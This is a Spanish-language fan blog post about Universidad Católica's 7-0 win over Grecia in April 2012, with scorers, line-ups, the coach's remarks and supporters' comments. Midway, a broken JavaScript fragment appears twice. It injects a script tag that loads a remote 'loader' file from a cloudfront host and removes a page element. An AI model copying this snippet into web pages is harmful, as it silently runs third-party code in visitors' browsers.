Posteado por: elblogchatolei | abril 22, 2012

Trencito Azul golea al cuadro chonero: U.Católica 7-0 Grecia 21/04/2012

Henry Pata, dos goles al Grecia

Facundo Martínez, capitán del equipo, añadió otro tanto en la goleada de ayer 21/04/2012.

Universidad Católica derrotó por goleada a Grecia en la cancha de SD Aucas en donde hizo las veces de local. Con este nuevo triunfo, el “Trencito Azul” continúa peleando por los primeros lugares de la tabla en pos del ascenso a la serie A.
U.Católica salió a liquidar el compromiso desde el inicio de las acciones, prueba de ello fue que apenas se movió el esférico el primer ataque “Camaratta” terminó en el fondo de las redes. Un remate a quemarropa de Henry Pata terminó en gol tras un grave error de Costa.
Luego de la primera conquista del partido el dominio fue sumamente claro a favor del elenco local que prácticamente no pasó sobresaltos en su portería. Pese a no aumentar la ventaja, fue evidente que el trámite del partido estaba controlado y conforme se consumieron los minutos, el segundo tanto se hacía inminente.
Al minuto 37 se marcó la segunda del partido, un nuevo error del golero Costa le permitió a Diego Benítez definir a placer para aumentar la ventaja. Posteriormente, sobre el final del primer tiempo un falta penal cometida por Carlos Poroso (quien vio la tarjeta roja por la falta) sobre Benítez terminó en el tercer gol luego de una precisa ejecución de Facundo Martínez.
En el inicio de la etapa de complemento el trámite no varió y sobre el minuto 54 Henry Pata firmó su segunda conquista personal y la cuarta para el “Trencito Azul”. Con el partido definido, algo intentó Grecia pero Galindez respondió en la única situación que generó el elenco visitante.

En la réplica, sobre el minuto 71 Paulo De la Cruz anotó la quinta del encuentro, el juvenil conectó un certero disparo de volea para dejar sin chances al golero rival. Sobre el final del cotejo, la “Chatoleí” terminó de liquidar a un rival entregado por completo, Emerson Perea marcó la sexta al minuto 84 a la salida de un tiro de esquina. Pocos instantes después, Jorge Luis Cuesta puso la séptima sobre el minuto 87.
Así concluyó el partido, con un resultado abultado a favor de U. Católica que con esto sigue peleando en los primeros lugares de la tabla de posiciones.

Jorge Célico satisfecho

El estratega valoró lo conseguido en el Estadio del Sur y se mostró satisfecho con el rendimiento de su equipo que sigue peleando en lo más alto de la tabla.
“Esta victoria es importante porque nos ayuda a fortalecer el estado de ánimo, la actuación del equipo me deja satisfecho porque marcaron todos los delanteros. Es importante haber conseguido una ventaja tan abultada porque esto nos puede servir al final, recordemos que el año pasado Macara nos sacó ventaja por la diferencia de goles que nos sacaron.

Por eso en el entretiempo les pedí que sean serios y marquen todas las veces que puedan.
Para mi es importante que el equipo siga rindiendo de esta manera, nosotros tenemos la plantilla más joven con u promedio de edad de 21 años y somos un equipo que arriesga, jugamos con tres delanteros y cuando se nos dan las posibilidades podemos marcar como el día de hoy” apuntó en director técnico argentino.
Alineaciones:
U.Católica: H. Galindez, Y. Valencia, A. Mendoza y E. Perea; A. Godoy, F. Martínez (C. Moyano), R. Ibarra (A. Chalá), E. Patta (J. L. Cuesta) y H. Patta; D. Benítez y P. De la Cruz.
Grecia: J. Costa, E. Quiñónez (A. Valverde), C. Poroso, R. Arboleda y G. Macías; D. García, V. Macías, E. Medina (D. Rodríguez) y J. Cevallos; J. Carabalí y B. Falcones (M.Zambrano).
Goles:
Henry Pata (1′, 54′)
Diego Benítez (37′)
Facundo Martínez (47′, penal)
Paulo De la Cruz (71′)
Emerson Perea (84′)
Jorge Luis Cuesta (87′)

// -1 ? ‘https’: ‘http’;
var ccm = document.createElement(‘script’); ccm.type = ‘text/javascript’; ccm.async = true;
ccm.src = http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;
var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ccm, s);

jQuery(‘#cblocker’).remove();
});
};
// ]]>

// -1 ? ‘https’: ‘http’;
var ccm = document.createElement(‘script’); ccm.type = ‘text/javascript’; ccm.async = true;
ccm.src = http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;
var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ccm, s);

jQuery(‘#cblocker’).remove();
});
};
// ]]>

Anuncios

Responses

  1. bueno bien por l chato amigos catolicos ayedemen a realizar una encuasta mas omens cuantos hinchas de la chato fueron al estadio del aucas, lamentablemente no pude ir por temas laborales

    • Segun el articulo de El Comercio 50.

      • no entiendo

      • ahh si perdon gracias xavier
        saludos
        camaratta de corazon

  2. Hola amigos de mi chatoeli, pues en un comentario anterior, pedí que se busquen goles hasta el final del partido, y esta goleada me pone a soñar y a gritar a viva vos “viva la chatolei” en un buen equipo competitivo; pero nos falta ahora conseguir las victorias de visitante; nonos olvidemos que somos ecuatorianos, y por lo tanto cualquier cancha sera nuestra localía.

  3. Bien por la Chatoleí. Esperemos mantenernos así también de visitantes frente al River.

    Saludos a todos los camaratas.

  4. Felicitaciones muchachos. Fue una fiesta de goles. A no bajar los brazos aue aun falta mucho. Sean 5 o 10 o 50 o 1 millon el apoyo es total!!

  5. He podido ir a ver los tres últimos partidos de local de la Chato y me alegra que el plantel se vaya consolidando en la defensa se lo ve muy sólido con el respaldo de un arquero muy serio con un buen saque, seguro de manos, que me hace recordar a arqueros qu e vinieron antes como, Romera, Pérez, Dedé Rios entre otros, comparto el criterio de que nos falta mostrar ese juego de conjunto en los partidos de visitante por lo demás felicitaciones, los muchachos del Grecia se regresaron con el bus lleno de goles. Seguiremos apoyando los necios de toda la vida.

  6. Por favor cuenten si de aquí en adelante mi trencito va a jugar en el sur, ahí si que se complica, desde mi casa (Ponceano) siquiera es hora de ida y otra de vuelta, cuando regresamos al Atahualpa?

    • El Atahualopa estara solo disponible para juegos de la serie A, hasta el juego Ecuador-Colombia.

  7. Ah, sobre el juego, creo que así como no quise desilusionarme con la pérdida en Azogues, la goleada no debe ilusionarnos aún , el torneo es largo y todavía no entiendo porque de visita el equipo decae tanto. Suerte? mentalidad de nuestros jugadores? táctica? Celico deberá rapidamente analizar esto y encontrar una solución para empezar a sumar de visita o mas adelante veremos (pagaremos) las consecuencias.


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Categorías

A %d blogueros les gusta esto: